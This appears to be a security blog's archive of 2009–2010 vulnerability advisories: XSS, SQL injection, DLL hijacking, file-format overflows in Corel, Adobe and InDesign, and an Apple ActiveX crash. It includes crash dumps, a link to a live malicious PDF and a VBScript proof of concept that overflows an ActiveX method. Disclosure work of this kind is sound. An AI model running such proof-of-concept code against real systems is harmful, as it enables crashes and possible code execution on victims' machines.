Posts Tagged ‘report’

Netautor Professional 5.5.0 (goback) XSS Vulnerability

Vendor: digiconcept
Product web page: http://www.digiconcept.net
Affected version: 5.5.0 and DW 5.3.1

Summary: Netautor Professional is an application server and
development environment. Netautor Professional was developed
to serve the practical needs of users, and was continuously
advanced.

Digital Workroom is a well proven and time-tested Content Management
System. It is based on “Netautor Professional”, the application server also
developed by digiconcept, and on PHP 5. The standard functional range covers
the majority of needs in Internet and Intranet environments for publication
and communication.

Desc: Netautor Professional v5.5.0 suffers from an XSS vulnerability because
input passed via the “goback” parameter to the login2.php script is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user’s browser session in the context of an
affected site.

Tested on: MS WinXP Pro SP3 (EN)
PHP 5.3.0
MySQL 5.1.36
Apache 2.2.11 (Win32)

Vendor status: [14.09.2010] Vulnerability discovered.
[15.09.2010] Contact with the vendor.
[17.09.2010] No reply from vendor.
[17.09.2010] Public advisory released.

Advisory: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4964.php

Multiple Vendors DLL Hijacking Exploits

Exactly :)

H D Moore (Metasploit Project), after announcing that he had found some 40 vulnerabilities in Microsoft products, on 22 August also published his kit for auditing DLL libraries and their “kidnapping”, or hijacking. It is DLLHijackAuditKit v2, which checks every extension registered on your system and its corresponding libraries, and also exploits them. The kit is simple to use: the audit takes 15-30 minutes, after which exploit codes are created in the Exploits folder that you can use for any purpose you like :)

More: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html and http://blog.metasploit.com/2010/08/better-faster-stronger.html.

Naturally, so as not to be left behind, the Zero Science Lab team also audited one of its own lab systems and found quite a few vulnerabilities, which follow…

- Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

- Adobe Extension Manager CS5 v5.0.298 (dwmapi.dll) DLL Hijacking Exploit

- Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

- CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Google Earth v5.1.3535.3218 (quserex.dll) DLL Hijacking Exploit

- Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit

- Microsoft Office PowerPoint 2007 v12.0.4518 (pp4x322.dll) DLL Hijacking Exploit

- Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit

- Microsoft Visio 2010 v14.0.4514.1004 (dwmapi.dll) DLL Hijacking Exploit

Once the DLL Hijack Audit Kit v2 was published, more than 100 exploits were released worldwide within a few days, so Microsoft reacted immediately by publishing a tool that works around these weaknesses.

Source: http://www.computerworld.com/s/article/9181518/Microsoft_releases_tool_to_block_DLL_load_hijacking_attacks?taxonomyId=17&pageNumber=1

You can download the tool at the following link: http://support.microsoft.com/kb/2264107 (requirement: a valid operating system)

Such exploits are still being published as you read this text, and it is frightening. Be careful whom you download files from and stay safe.

So far, the quickest way to follow the publication of such exploits is Exploit-DB: http://www.exploit-db.com/local/
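The audit kit flags DLLs that an application loads by bare name but that exist neither in its own directory nor in the system directories, so the Windows loader falls through to the current working directory (the folder a document was opened from); the Microsoft tool linked above is assumed here to work by removing the current directory from that search. As an added example, not part of the original post and not code from the Metasploit kit or Microsoft's tool, the following Python models that search order on a constructed XP-like file system (all paths, file names and the hypothetical application are constructed for illustration).

```python
"""Simplified model of the Windows DLL search order with SafeDllSearchMode on:
application directory, system directories, current working directory, PATH.
Added example; file system and paths below are constructed, not real."""
from typing import Iterable, List, Optional

SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]


def search_order(app_dir: str, cwd: str, path_dirs: Iterable[str],
                 cwd_in_search: bool = True) -> List[str]:
    """Directories probed, in order, when a DLL is loaded by bare name.
    cwd_in_search=False models a mitigation that drops the current working
    directory from the search (assumed effect of the KB2264107 tool)."""
    order = [app_dir, *SYSTEM_DIRS]
    if cwd_in_search:
        order.append(cwd)
    return order + list(path_dirs)


def resolve_dll(name: str, app_dir: str, cwd: str, path_dirs: Iterable[str],
                fs: Iterable[str], cwd_in_search: bool = True) -> Optional[str]:
    """Return the first path at which `name` exists, or None if the load fails."""
    present = {p.lower() for p in fs}
    for directory in search_order(app_dir, cwd, path_dirs, cwd_in_search):
        candidate = f"{directory}\\{name}"
        if candidate.lower() in present:
            return candidate
    return None


def hijackable(imports: Iterable[str], app_dir: str, path_dirs: Iterable[str],
               fs: Iterable[str]) -> List[str]:
    """DLL names an application loads that exist in no trusted directory
    (app dir, system dirs, PATH): these are the ones taken from the CWD when a
    document is opened from an untrusted folder, which is what the audit found."""
    trusted = [app_dir, *SYSTEM_DIRS, *path_dirs]
    present = {p.lower() for p in fs}
    return [d for d in imports
            if not any(f"{t}\\{d}".lower() in present for t in trusted)]


# Constructed XP-like file system: dwmapi.dll is a Vista-era DLL missing from
# XP's System32, while the (untrusted) document share happens to contain one.
FS = [r"C:\Windows\System32\kernel32.dll", r"C:\Windows\System32\user32.dll",
      r"C:\Program Files\App\app.exe", r"\\share\docs\dwmapi.dll"]
APP_DIR, DOCS, PATH_DIRS = r"C:\Program Files\App", r"\\share\docs", []

if __name__ == "__main__":
    print(resolve_dll("kernel32.dll", APP_DIR, DOCS, PATH_DIRS, FS))
    print(resolve_dll("dwmapi.dll", APP_DIR, DOCS, PATH_DIRS, FS))
    print(resolve_dll("dwmapi.dll", APP_DIR, DOCS, PATH_DIRS, FS, cwd_in_search=False))
    print(hijackable(["kernel32.dll", "user32.dll", "dwmapi.dll"], APP_DIR, PATH_DIRS, FS))
```

With the CWD in the search, dwmapi.dll resolves to the share; with it removed, the load simply fails, while kernel32.dll resolves from System32 either way.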

Zero Science Lab

Corel WordPerfect Office X5 and Corel Presentations X5 File Handling Vulnerabilities

- Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC

- Corel Presentations X5 15.0.0.357 (shw) Remote Buffer Preoccupation PoC

Corel Corporation

http://www.corel.com

Version: 15.0.0.357 (Standard Edition)

– Summary: Corel® WordPerfect® Office X5 – Standard Edition is the essential
office suite for word processing, spreadsheets, presentations and email.
Chosen over Microsoft® Office by millions of longtime users, it integrates
the latest productivity software with the best of the Web. Work faster and
collaborate more efficiently with all-new Web services, new Microsoft® Office
SharePoint® support, more PDF tools and even better compatibility with Microsoft
Office. It’s everything you expect in an office suite—for less.

– Desc: Corel WordPerfect and Corel Presentations X5 are prone to a remote buffer overflow vulnerability because
the application fails to perform adequate boundary checks on user-supplied input in
.WPD (WordPerfect Document) and .SHW (Presentations Slide Show) files. Attackers may exploit this issue to execute arbitrary
code in the context of the application. Failed attacks will cause denial-of-service
conditions.

– Tested On: Microsoft Windows XP Professional SP3 (English)

– Vulnerability Discovered By: Gjoko ‘LiquidWorm’ Krstic

– liquidworm gmail com

– Zero Science Lab – http://www.zeroscience.mk

– 09.07.2010

– Vendor status:

[09.07.2010] Vulnerability discovered.
[09.07.2010] Initial contact with the vendor.
[12.07.2010] No reply from vendor.
[12.07.2010] Public advisory released.

Details:

Corel Presentations X5 15.0.0.357 (shw) Remote Buffer Preoccupation PoC
Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC

Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability

Title:

Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability

Summary:

Adobe Reader software is the global standard for electronic document sharing. It is the only PDF
file viewer that can open and interact with all PDF documents. Use Adobe Reader to view, search,
digitally sign, verify, print, and collaborate on Adobe PDF files.

Vendor:

Adobe Systems Incorporated

Product Web Page:

http://www.adobe.com/

Version tested:

9.3.2
9.3.1

Description:

Adobe Reader suffers from a remote memory corruption vulnerability that causes the application to
crash while processing a malicious .PDF file. The issue is triggered when the reader tries to
initialize the CoolType Typography Engine (cooltype.dll). This vulnerability also affects and crashes
major browsers such as Mozilla Firefox, Opera and Apple Safari. Google Chrome and IE do not crash.
Talking about Blended Threat Vulnerabilities ;).

———————————————————————————–

(bd0.e14): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=313100ee ebx=0211a722 ecx=00000031 edx=02e091a4 esi=00017e58 edi=00000000
eip=08075dc2 esp=0012d478 ebp=0012d488 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
CoolType!CTInit+0x2f827:
08075dc2 660fb644322c movzx ax,byte ptr [edx+esi+2Ch] ds:0023:02e21028=??

———————————————————————————–

Tested On:

Microsoft Windows XP Professional SP3 (English)
Microsoft Windows XP Professional SP2 (English)
Microsoft Windows 7 Ultimate
GNU/Linux Ubuntu Desktop 9.10 (i386) 32-bit
GNU/Linux Fedora 10 (Cambridge) / 2.6.27.41-170.2.117.fc10.i686

Vendor Status:

18.04.2010 – Vendor informed.
18.04.2010 – Vendor replied.
07.05.2010 – Asked vendor for confirmation.
07.05.2010 – Vendor confirms vulnerability.
03.06.2010 – Asked vendor for status.
03.06.2010 – Vendor replied.
24.06.2010 – Vendor reveals patch release date.
29.06.2010 – Coordinated public advisory.

Advisory Details:

Zero Science Lab Advisory ID: ZSL-2010-4943
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4943.php
Adobe Advisory ID: APSB10-15
Advisory: http://www.adobe.com/support/security/bulletins/apsb10-15.html
CVE ID: CVE-2010-2204

Live Demo:

http://www.zeroscience.mk/codes/thricer.pdf

Vulnerability Discovered By:

Gjoko ‘LiquidWorm’ Krstic

liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

More: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4943.php

UK One Media CMS (id) Error Based SQL Injection Vulnerability

Summary: Content Management System (PHP+MySQL)

Vendor: UK One Media – http://www.uk1media.com

Desc: UK One Media CMS suffers from an SQL injection vulnerability when building a query from the id parameter, which can result in compromise of the entire database structure and execution of system commands.

Tested on Apache 2.x (linux), PHP/5.2.11 and MySQL/4.1.22

More details: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4942.php

Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability

Vendor: Adobe Systems Inc.

Product Web Page: http://www.adobe.com

Version tested: CS3 10.0

Summary: Adobe® InDesign® CS3 software provides precise control over typography and built-in creative tools for designing, preflighting, and publishing documents for print, online, or to mobile devices. Include interactivity, animation, video, and sound in page layouts to fully engage readers.

Desc: When the application parses a crafted .indd file, it crashes instantly, overwriting CPU registers. Depending on the offset, EBP, EDI, EDX and ESI get overwritten. Potential impact is arbitrary code execution and denial of service.

Tested on Microsoft Windows XP Professional SP3 (English)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic

liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

16.09.2009

Vendor status:

[16.09.2009] Vulnerability discovered.
[09.03.2010] Vulnerability reported to vendor with sent PoC files.
[21.03.2010] Asked confirmation from the vendor.
[21.03.2010] Vendor asked for PoC files due to communication errors.
[22.03.2010] Re-sent PoC files to vendor.
[04.04.2010] Vendor confirms vulnerability.
[03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
[04.06.2010] Public advisory released.

Zero Science Lab Advisory ID: ZSL-2010-4941

More info: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4941.php

Security Threat Report: 2010 [Sophos]

The first decade of the 21st century saw a dramatic change in the nature of cybercrime. Once the province of teenage boys spreading graffiti for kicks and notoriety, hackers today are organized, financially motivated gangs. In the past, virus writers displayed offensive images and bragged about the malware they had written; now hackers target companies to steal intellectual property, build complex networks of compromised PCs and rob individuals of their identities.
2009 saw Facebook, Twitter and other social networking sites solidify their position at the heart of many users’ daily internet activities, and saw these websites become a primary target for hackers. Because of this, social networks have become one of the most significant vectors for data loss and identity theft.
New computing platforms also emerged last year, and shortly thereafter fell victim to cybercriminal activities. What was lost was once again found in 2009, as old hacking techniques re-emerged as means to penetrate data protection.

By understanding the problems that have arisen in the past, perhaps internet users can craft themselves a better, safer future.

Read full report: SophosSecReport2010.pdf

On Apple.com’s doorstep

We did a small analysis of two or three Apple applications and found a small “bug” in the Apple Software Update application for the Windows platform, more precisely in the SoftwareUpdateAdmin.dll library.

Nothing terrible, but we still contacted the Apple Product Security Team (http://www.apple.com/support/security/) with detailed information and, as we hoped, they replied immediately, stating that it is nothing serious that would directly affect the security of the system.

With the help of the COMRaider tool, made by iDefense, for scanning COM objects (ActiveX, OCX) and … fuzzing them, an exception (VC_THROW_SEH) was found…


Exception Code: VC_THROW_SEH
Disasm: 7C812AEB POP ESI (KERNEL32.dll)


Seh Chain:
--------------------------------------------------
1 10020105 SoftwareUpdateAdmin.DLL
2 1001FFE6 SoftwareUpdateAdmin.DLL
3 73352526 VBSCRIPT.dll
4 7C839AC0 KERNEL32.dll


Called From Returns To
--------------------------------------------------
KERNEL32.7C812AEB SoftwareUpdateAdmin.1000B7AA
SoftwareUpdateAdmin.1000B7AA SoftwareUpdateAdmin.10009345
SoftwareUpdateAdmin.10009345 SoftwareUpdateAdmin.100082FF


Registers:
--------------------------------------------------
EIP 7C812AEB -> E06D7363 -> Asc: csmcsm
EAX 0013E7C8 -> E06D7363 -> Asc: csmcsm
EBX 00000000
ECX 00000000
EDX 00000000
EDI 00000000
ESI 0013E850 -> 0013E8D4
EBP 0013E818 -> 0013E850
ESP 0013E7C4 -> 00F83E2C -> Asc: ,>,>


Block Disassembly:
--------------------------------------------------
7C812ADB LEA EDI,[EBP-3C]
7C812ADE REP MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
7C812AE0 POP EDI
7C812AE1 LEA EAX,[EBP-50]
7C812AE4 PUSH EAX
7C812AE5 CALL [7C801510]
7C812AEB POP ESI <--- CRASH
7C812AEC LEAVE
7C812AED RETN 10
7C812AF0 TEST EDI,EDI
7C812AF2 JLE 7C80BE2E
7C812AF8 MOV EDX,[EBP-4]
7C812AFB MOV [EBP+C],EDX
7C812AFE MOVZX EDX,WORD PTR [ESI]
7C812B01 MOV EDI,[EBP-8]


ArgDump:
--------------------------------------------------
EBP+8 E06D7363
EBP+12 00000001
EBP+16 00000003
EBP+20 0013E844 -> 19930520
EBP+24 E06D7363
EBP+28 00000001



Stack Dump:
--------------------------------------------------
13E7C4 2C 3E F8 00 63 73 6D E0 01 00 00 00 00 00 00 00 [....csm.........]
13E7D4 EB 2A 81 7C 03 00 00 00 20 05 93 19 AC E8 13 00 [................]
13E7E4 E8 7C 02 10 F0 C3 4E 77 28 E8 13 00 CD F7 52 77 [......Nw......Rw]
13E7F4 80 91 18 00 00 00 00 00 5C 1A 4E 77 20 E8 13 00 [........\.Nw....]
13E804 AA 88 51 77 78 91 18 00 00 00 00 00 C0 E8 13 00 [..Qw............]


CompanyName Apple Inc.
FileDescription Apple Software Update
FileVersion 2.1.1.116
InternalName SoftwareUpdateAdmin.dll
LegalCopyright (c) 2006-2008 Apple Inc. All rights reserved.
OriginalFileName SoftwareUpdateAdmin.dll
ProductName Apple Software Update
ProductVersion 2.1.1.116


Report for Clsid: {BB46F03E-7CD2-489F-8F95-BB950F395FDB}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: False


----------------------poc----------------------


<object classid='clsid:BB46F03E-7CD2-489F-8F95-BB950F395FDB' id='target' />
<script language='vbscript'>


targetFile = "C:\Program Files\Apple Software Update\SoftwareUpdateAdmin.dll"
prototype  = "Sub CreateTaskWithTrigger2 ( ByVal taskPath As String ,  ByVal launchParameters As String ,  ByVal frequency As Long )"
memberName = "CreateTaskWithTrigger2"
progid     = "SoftwareUpdateAdminLib.ASUTaskScheduler"
argCount   = 3


arg1=String(12308, "A")
arg2="defaultV"
arg3=1

target.CreateTaskWithTrigger2 arg1 ,arg2 ,arg3
</script>

----------------------poc----------------------


Discovered on: 15.03.2010

;)